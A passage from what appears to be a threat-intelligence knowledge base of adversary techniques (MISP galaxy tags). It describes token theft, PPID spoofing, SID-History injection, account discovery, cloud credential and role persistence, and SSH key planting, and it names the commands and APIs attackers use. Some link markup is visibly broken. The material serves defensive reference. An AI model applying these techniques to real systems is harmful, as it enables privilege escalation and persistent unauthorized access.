While this technique is distinct from [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.

The tag is: misp-galaxy:technique="Create Process with Token"

Make and Impersonate Token

Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session’s access token and the adversary can use SetThreadToken to assign the token to a thread.

This behavior is distinct from [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) in that this refers to creating a new user token instead of stealing or duplicating an existing one.

The tag is: misp-galaxy:technique="Make and Impersonate Token"

Parent PID Spoofing

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.<sup>[[DidierStevens SelectMyParent Nov 2009](https://app.tidalcyber.com/references/1fee31b0-2d9c-4c02-b494-d3a6b80f12f3)]</sup> This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.<sup>[[Microsoft UAC Nov 2018](https://app.tidalcyber.com/references/abda4184-18f9-4799-9c1f-3ba484473e35)]</sup>

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](Rundll32(https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment]([CounterCept PPID Spoofing Dec 2018(https://app.tidalcyber.com/references/a1fdb8db-4c5f-4fb9-a013-b232cd8471f8)]</sup> This spoofing could be executed via [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) within a malicious Office document or any code that can perform [Native API]([CTD PPID Spoofing Macro Mar 2019(https://app.tidalcyber.com/references/b06b72ba-dbd6-4190-941a-0cdd3d659ab6)]</sup><sup>[[CounterCept PPID Spoofing Dec 2018](https://app.tidalcyber.com/references/a1fdb8db-4c5f-4fb9-a013-b232cd8471f8)]</sup>

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.<sup>[[XPNSec PPID Nov 2017](https://app.tidalcyber.com/references/0dbf093e-4b54-4972-b048-2a6411037da4)]</sup>

The tag is: misp-galaxy:technique="Parent PID Spoofing"

SID-History Injection

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. <sup>[[Microsoft SID](https://app.tidalcyber.com/references/c921c476-741e-4b49-8f94-752984adbba5)]</sup> An account can hold additional SIDs in the SID-History Active Directory attribute <sup>[[Microsoft SID-History Attribute](https://app.tidalcyber.com/references/32150673-5593-4a2c-9872-aaa96a21aa5c)]</sup>, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values <sup>[[Microsoft Well Known SIDs Jun 2017](https://app.tidalcyber.com/references/14b344ed-bde6-4755-b59a-595edb23a210)]</sup> may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1), [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd), or [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b).

The tag is: misp-galaxy:technique="SID-History Injection"

Token Impersonation/Theft

Adversaries may duplicate then impersonate another user’s existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using DuplicateToken or DuplicateTokenEx. The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user’s security context, or with SetThreadToken to assign the impersonated token to a thread.

An adversary may perform [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a) using CreateProcessWithTokenW or CreateProcessAsUserW. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) is also distinct from [Make and Impersonate Token](https://app.tidalcyber.com/technique/561da0ae-4ebc-4356-a954-338249cac31a) in that it refers to duplicating an existing token, rather than creating a new one.

The tag is: misp-galaxy:technique="Token Impersonation/Theft"

Access Token Manipulation

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.

An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7)) or used to spawn a new process (i.e. [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.<sup>[[Pentestlab Token Manipulation](https://app.tidalcyber.com/references/243deb44-4d47-4c41-bd5d-262c4319cce5)]</sup>

Any standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

The tag is: misp-galaxy:technique="Access Token Manipulation"

Account Access Removal

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to set malicious changes into place.<sup>[[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)]</sup><sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>

In Windows, [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets may be used by adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) objective.

The tag is: misp-galaxy:technique="Account Access Removal"

Cloud Account - Duplicate

Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

With authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.<sup>[[Microsoft msolrolemember](https://app.tidalcyber.com/references/ca28494c-d834-4afc-9237-ab78dcfc427b)]</sup><sup>[[GitHub Raindance](https://app.tidalcyber.com/references/321bba10-06c6-4c4f-a3e0-318561fa0fed)]</sup> The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup><sup>[[Black Hills Red Teaming MS AD Azure, 2018](https://app.tidalcyber.com/references/48971032-8fa2-40ff-adef-e91d7109b859)]</sup>

The AWS command <code>aws iam list-users</code> may be used to obtain a list of users in the current account while <code>aws iam list-roles</code> can obtain IAM roles that have a specified path prefix.<sup>[[AWS List Roles](https://app.tidalcyber.com/references/42ff02f9-45d0-466b-a5fa-e19c8187b529)]</sup><sup>[[AWS List Users](https://app.tidalcyber.com/references/517e3d27-36da-4810-b256-3f47147b36e3)]</sup> In GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects get-iam-policy</code> may be used to obtain a listing of service accounts and users in a project.<sup>[[Google Cloud - IAM Servie Accounts List API](https://app.tidalcyber.com/references/3ffad706-1dac-41dd-b197-06f22fec3b30)]</sup>

The tag is: misp-galaxy:technique="Cloud Account - Duplicate"

Domain Account - Duplicate

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.

The tag is: misp-galaxy:technique="Domain Account - Duplicate"

Email Account

Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).<sup>[[Microsoft Exchange Address Lists](https://app.tidalcyber.com/references/138ec24a-4361-4ce0-b78e-508c11db397c)]</sup>

In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.<sup>[[Microsoft getglobaladdresslist](https://app.tidalcyber.com/references/a4948a80-d11c-44ed-ae63-e3f5660463f9)]</sup><sup>[[Black Hills Attacking Exchange MailSniper, 2016](https://app.tidalcyber.com/references/adedfddc-29b7-4245-aa67-cc590acb7434)]</sup>

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.<sup>[[Google Workspace Global Access List](https://app.tidalcyber.com/references/5104f0ea-1fb6-4260-a9b6-95922b3a8e5b)]</sup>

The tag is: misp-galaxy:technique="Email Account"

Local Account - Duplicate

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility and <code>id</code> and <code>groups</code>on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS the <code>dscl . list /Users</code> command can be used to enumerate local accounts.

The tag is: misp-galaxy:technique="Local Account - Duplicate"

Account Discovery

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.

For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

The tag is: misp-galaxy:technique="Account Discovery"

Additional Cloud Credentials

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup><sup>[[Blue Cloud of Death](https://app.tidalcyber.com/references/0c764280-9d8c-4fa4-9088-170f02550d4c)]</sup><sup>[[Blue Cloud of Death Video](https://app.tidalcyber.com/references/39b0adf6-c71e-4501-b8bb-fab82718486b)]</sup> These credentials include both x509 keys and passwords.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.<sup>[[Demystifying Azure AD Service Principals](https://app.tidalcyber.com/references/3e285884-2191-4773-9243-74100ce177c8)]</sup>

In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://app.tidalcyber.com/technique/3c4a2f3a-5877-4a27-a417-76318523657e), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.<sup>[[GCP SSH Key Add](https://app.tidalcyber.com/references/372b6cfd-abdc-41b7-be78-4b1dc0426044)]</sup> This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup><sup>[[Expel Behind the Scenes](https://app.tidalcyber.com/references/d538026c-da30-48d2-bc30-fde3776db1a8)]</sup>

Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts]([Rhino Security Labs AWS Privilege Escalation(https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup><sup>[[Sysdig ScarletEel 2.0](https://app.tidalcyber.com/references/90e60242-82d8-5648-b7e4-def6fd508e16)]</sup> For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application’s service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.<sup>[[SpecterOps Azure Privilege Escalation](https://app.tidalcyber.com/references/5dba5a6d-465e-4489-bc4d-299a891b62f6)]</sup>

In AWS environments, adversaries with the appropriate permissions may also use the sts:GetFederationToken API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. <sup>[[Crowdstrike AWS User Federation Persistence](https://app.tidalcyber.com/references/8c4f806c-b6f2-5bde-8525-05da6692e59c)]</sup>

The tag is: misp-galaxy:technique="Additional Cloud Credentials"

Additional Cloud Roles

An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.<sup>[[AWS IAM Policies and Permissions](https://app.tidalcyber.com/references/9bb520fa-0c4f-48aa-8b0a-8f1d42ee1d0c)]</sup><sup>[[Google Cloud IAM Policies](https://app.tidalcyber.com/references/b23a0df2-923d-4a5d-a40c-3ae218a0be94)]</sup><sup>[[Microsoft Support O365 Add Another Admin, October 2019](https://app.tidalcyber.com/references/c31cfc48-289e-42aa-8046-b41261fdeb96)]</sup><sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup> With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).<sup>[[Expel AWS Attacker](https://app.tidalcyber.com/references/089f6f4e-370c-49cb-a35c-c80be0fd39de)]</sup> <sup>[[Microsoft O365 Admin Roles](https://app.tidalcyber.com/references/8014a0cc-f793-4d9a-a2cc-ef9e9c5a826a)]</sup>

This account modification may immediately follow [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup>

The tag is: misp-galaxy:technique="Additional Cloud Roles"

Additional Container Cluster Roles

An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.<sup>[[Kubernetes RBAC](https://app.tidalcyber.com/references/37c0e0e1-cc4d-5a93-b8a0-224f031b7324)]</sup><sup>[[Aquasec Kubernetes Attack 2023](https://app.tidalcyber.com/references/6d6e2fc8-9806-5480-bfaa-a43a962a4980)]</sup> Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.<sup>[[Kuberentes ABAC](https://app.tidalcyber.com/references/7f960599-a3d6-53bb-91ff-f0e6117a30ed)]</sup>

This account modification may immediately follow [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that they have compromised.

Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.<sup>[[Google Cloud Kubernetes IAM](https://app.tidalcyber.com/references/e8ee3ac6-ae7c-5fd3-a339-b579a419dd96)]</sup><sup>[[AWS EKS IAM Roles for Service Accounts](https://app.tidalcyber.com/references/b2452f0e-93b0-55b7-add8-8338d171f0bf)]</sup><sup>[[Microsoft Azure Kubernetes Service Service Accounts](https://app.tidalcyber.com/references/bf374b41-b2a3-5c07-bf84-9ea0e1a9e6c5)]</sup> In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1).

The tag is: misp-galaxy:technique="Additional Container Cluster Roles"

Additional Email Delegate Permissions

Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.

For example, the <code>Add-MailboxPermission</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.<sup>[[Microsoft - Add-MailboxPermission](https://app.tidalcyber.com/references/b8d40efb-c78d-47dd-9d83-e5a31af73691)]</sup><sup>[[FireEye APT35 2018](https://app.tidalcyber.com/references/71d3db50-4a20-4d8e-a640-4670d642205c)]</sup><sup>[[Crowdstrike Hiding in Plain Sight 2018](https://app.tidalcyber.com/references/8612fb31-5806-47ca-ba43-265a590b61fb)]</sup> In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.<sup>[[Gmail Delegation](https://app.tidalcyber.com/references/dfd28a01-56ba-4c0c-9742-d8b1db49df06)]</sup><sup>[[Google Ensuring Your Information is Safe](https://app.tidalcyber.com/references/ad3eda19-08eb-4d59-a2c9-3b5ed8302205)]</sup>

Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.<sup>[[Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452](https://app.tidalcyber.com/references/7aa5c294-df8e-4994-9b9e-69444d75ef37)]</sup>

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)), so the messages evade spam/phishing detection mechanisms.<sup>[[Bienstock, D. - Defending O365 - 2019](https://app.tidalcyber.com/references/4866e6c3-c1b2-4131-bd8f-0ac228168a10)]</sup>

The tag is: misp-galaxy:technique="Additional Email Delegate Permissions"

Device Registration

Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.

MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.<sup>[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]</sup><sup>[[DarkReading FireEye SolarWinds](https://app.tidalcyber.com/references/a662c764-8954-493f-88e5-e022e093a785)]</sup> In some cases, the MFA self-enrollment process may require only a username and password to enroll the account’s first device or to enroll a device to an inactive account. <sup>[[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]</sup>

Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.<sup>[[AADInternals - Device Registration](https://app.tidalcyber.com/references/978b408d-f9e9-422c-b2d7-741f6cc298d4)]</sup><sup>[[AADInternals - Conditional Access Bypass](https://app.tidalcyber.com/references/832841a1-92d1-4fcc-90f7-afbabad84aec)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup>

Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.<sup>[[Microsoft - Device Registration](https://app.tidalcyber.com/references/3f42fc18-2adc-46ef-ae0a-c2d530518435)]</sup> Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://app.tidalcyber.com/technique/03619027-8a54-4cb2-8f1d-38d476edbdd8) on an Azure AD tenant by registering a large number of devices.<sup>[[AADInternals - BPRT](https://app.tidalcyber.com/references/19af3fce-eb57-4e67-9678-1968e9ea9677)]</sup>

The tag is: misp-galaxy:technique="Device Registration"

SSH Authorized Keys

Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user’s home directory under <code><user-home>/.ssh/authorized_keys</code>.<sup>[[SSH Authorized Keys](https://app.tidalcyber.com/references/ff100b76-894e-4d7c-9b8d-5f0eedcf59cc)]</sup> Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.

Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.<sup>[[Google Cloud Add Metadata](https://app.tidalcyber.com/references/eba4b850-8784-4da2-b87d-54b5bd0f58d6)]</sup><sup>[[Google Cloud Privilege Escalation](https://app.tidalcyber.com/references/3dc4b69c-8cae-4489-8df2-5f55419fb3b1)]</sup> Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.<sup>[[Azure Update Virtual Machines](https://app.tidalcyber.com/references/299f231f-70d1-4c1a-818f-8a01cf65382c)]</sup> This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.<sup>[[Venafi SSH Key Abuse](https://app.tidalcyber.com/references/cba14230-13bc-47ad-8f3f-d798217657bd)]</sup><sup>[[Cybereason Linux Exim Worm](https://app.tidalcyber.com/references/9523d8ae-d749-4c25-8c7b-df2d8c25c3c8)]</sup> It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.

SSH keys can also be added to accounts on network devices, such as with the ip ssh pubkey-chain [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) command.<sup>[[cisco_ip_ssh_pubkey_ch_cmd](https://app.tidalcyber.com/references/c6ffe974-f304-598c-bc4d-5da607c73802)]</sup>

The tag is: misp-galaxy:technique="SSH Authorized Keys"

Account Manipulation

Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).

The tag is: misp-galaxy:technique="Account Manipulation"

Acquire Access

Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup><sup>[[Krebs Access Brokers Fortune 500](https://app.tidalcyber.com/references/37d237ae-f0a8-5b30-8f97-d751c1560391)]</sup> In some cases, adversary groups may form partnerships to share compromised systems with each other.<sup>[[CISA Karakurt 2022](https://app.tidalcyber.com/references/5a9a79fa-532b-582b-9741-cb732803cd22)]</sup>

Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd)) or established access via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup>

By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup>

In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf), [Multi-Factor Authentication Interception](https://app.tidalcyber.com/technique/600d45ec-cb9c-47b8-ae94-326471ebb007), or even [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f).

Note: while this technique is distinct from other behaviors such as [Purchase Technical Data](https://app.tidalcyber.com/technique/56ab198f-f8bb-4fe9-bd85-5975d4d3863b) and [Credentials](https://app.tidalcyber.com/technique/e5d9c785-61bd-483f-b2ac-5bd9a8641b22), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Acquire Access"

Botnet - Duplicate

